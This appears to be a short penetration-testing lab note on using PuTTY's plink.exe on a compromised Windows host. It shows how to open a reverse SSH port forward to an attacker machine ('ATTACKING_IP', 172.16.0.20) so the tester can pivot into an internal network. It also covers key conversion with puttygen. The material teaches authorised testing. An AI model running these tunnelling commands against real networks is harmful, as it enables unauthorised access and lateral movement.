plink

Plink.exe is a Windows command line version of the PuTTY SSH client

// Some code
Plink.exe is a Windows command line version of the PuTTY SSH client. 
Now that Windows comes with its own inbuilt SSH client, plink is less useful
 for modern servers; however, it is still a very useful tool, so we will cover it here.

Generally speaking, Windows servers are unlikely to have an SSH server running 
so our use of Plink tends to be a case of transporting the binary to the target, 
then using it to create a reverse connection. This would be done with the following 
command:
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

Notice that this syntax is nearly identical to previously when using the standard 
OpenSSH client. The cmd.exe /c echo y at the start is for non-interactive shells 
(like most reverse shells -- with Windows shells being difficult to stabilise), 
in order to get around the warning message that the target has not connected to this host before.

To use our example from before, if we have access to 172.16.0.5 and would like 
to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine 
(172.16.0.20), we could use this command:
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N

Note that any keys generated by ssh-keygen will not work properly here. 
You will need to convert them using the puttygen tool, which can be installed on
 Kali using sudo apt install putty-tools. After downloading the tool, conversion can 
 be done with:
puttygen KEYFILE -o OUTPUT_KEY.ppk
Substituting in a valid file for the keyfile, and adding in the output file.

The resulting .ppk file can then be transferred to the Windows target and used 
in exactly the same way as with the Reverse port forwarding taught in the previous 
task (despite the private key being converted, it will still work perfectly with
 the same public key we added to the authorized_keys file before).

Note: Plink is notorious for going out of date quickly, which often results 
in failing to connect back. Always make sure you have an up to date version 
of the .exe. Whilst there is a copy pre-installed on Kali 
at /usr/share/windows-resources/binaries/plink.exe, downloading a new copy from 
here before a new engagement is sensible.